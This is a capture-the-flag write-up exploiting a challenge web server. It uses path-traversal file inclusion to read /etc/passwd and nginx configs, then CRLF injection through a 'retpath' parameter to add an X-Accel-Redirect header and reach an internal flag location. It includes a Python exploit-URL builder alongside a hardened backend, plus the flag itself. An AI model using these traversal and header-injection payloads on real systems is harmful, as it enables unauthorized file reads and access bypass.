The task gives us a website where we can browse through a few different outputs:

http://109.233.61.11:27280/news/?f=31-12-2013

http://109.233.61.11:27280/news/?f=01-01-2014

After testing that parameter a bit, it turned out to be vulnerable to LFI (local file inclusion):

http://109.233.61.11:27280/news/?f=../../../etc/passwd

As the challenge hints (and as the Server response header confirms), the web server is nginx, so we go ahead and read its configuration file:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/nginx.conf

From it we see that the enabled site configurations live under “/etc/nginx/sites-enabled/”.

Opening the default one:

http://109.233.61.11:27280/news/?f=../../../etc/nginx/sites-enabled/default

we can see an interesting thing:

location = /secret/flag { root /home; internal; }

The path to the flag is therefore http://109.233.61.11:27280/secret/flag (with root /home, the file on disk is /home/secret/flag), but since the location is marked “internal”, nginx only serves it on an internal redirect and answers a direct request with 404. We can still reach it: the “retpath” parameter is reflected into a response header without CRLF filtering, so we can inject an X-Accel-Redirect header. nginx honours that header on responses coming from the backend and turns it into exactly the kind of internal redirect the location allows, bypassing the restriction:

http://109.233.61.11:27280/?retpath=/news/%0d%0aX-Accel-Redirect:%20/secret/flag
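To make the mechanism concrete, here is an added example that is not the challenge's own code (the backend behind nginx is never shown, so its language and logic are assumptions): a small Python model of a backend that copies retpath into the Location header of a 302 without filtering CR/LF, the hardened version beside it, and a minimal model of what nginx does with an injected X-Accel-Redirect. The hostname and the location block are taken from the page; the helper names and the backend behaviour are invented for illustration.

```python
import urllib.parse
from typing import Optional

# Added example, not the challenge's backend. It assumes the backend answers
# /?retpath=... with a 302 whose Location header is the raw parameter value.

# From the page: location = /secret/flag { root /home; internal; }
NGINX_INTERNAL_LOCATIONS = {
    "/secret/flag": "/home",
}


def is_safe_retpath(retpath: str) -> bool:
    """A redirect target must be a local path with no CR/LF or other control bytes."""
    return (
        retpath.startswith("/")
        and not retpath.startswith("//")
        and all(ch >= " " and ch != "\x7f" for ch in retpath)
    )


def build_redirect_response(retpath: str) -> bytes:
    """Vulnerable: the parameter lands in a header line unchecked, so a CRLF
    inside it terminates the Location header and starts an attacker-chosen one."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {retpath}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def build_redirect_response_safe(retpath: str) -> bytes:
    """Hardened: refuse anything that is not a plain local path."""
    if not is_safe_retpath(retpath):
        raise ValueError("retpath must be a local path without control characters")
    return build_redirect_response(retpath)


def parse_response_headers(raw: bytes) -> dict:
    """Split a raw HTTP response into a lowercase-name header dict, the way a
    proxy in front of the backend sees it."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def nginx_accel_target(headers: dict) -> Optional[str]:
    """Simplified model of nginx: if the upstream response carries
    X-Accel-Redirect, the request is restarted internally against that URI,
    which (unlike a client request) may hit an 'internal' location.
    Returns the file path nginx would serve, or None."""
    uri = headers.get("x-accel-redirect")
    if uri is None:
        return None
    root = NGINX_INTERNAL_LOCATIONS.get(uri)
    return None if root is None else root + uri


def exploit_url(base: str, accel_uri: str) -> str:
    """Build the same kind of URL as in the writeup: %0D%0A ends the Location
    header, then an X-Accel-Redirect header is injected."""
    payload = f"/news/\r\nX-Accel-Redirect: {accel_uri}"
    return f"{base}/?retpath={urllib.parse.quote(payload, safe='/')}"


if __name__ == "__main__":
    url = exploit_url("http://109.233.61.11:27280", "/secret/flag")
    print(url)
    retpath = urllib.parse.unquote(url.split("retpath=", 1)[1])
    hdrs = parse_response_headers(build_redirect_response(retpath))
    print("injected headers:", hdrs)
    print("nginx would serve:", nginx_accel_target(hdrs))
    try:
        build_redirect_response_safe(retpath)
    except ValueError as e:
        print("hardened backend:", e)
```

Two things worth remembering from this: real nginx only acts on X-Accel-Redirect when the header arrives in a response from a proxied (proxy_pass, FastCGI, uwsgi, SCGI) backend, which is exactly the situation here, and the fix belongs in the backend, which must never let CR/LF from user input reach a header line (many current web frameworks already reject newlines in header values for this reason).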

Flag: CTF{6e75d02b8e8329bb4b45c7dabd2e1da2}

Razor4x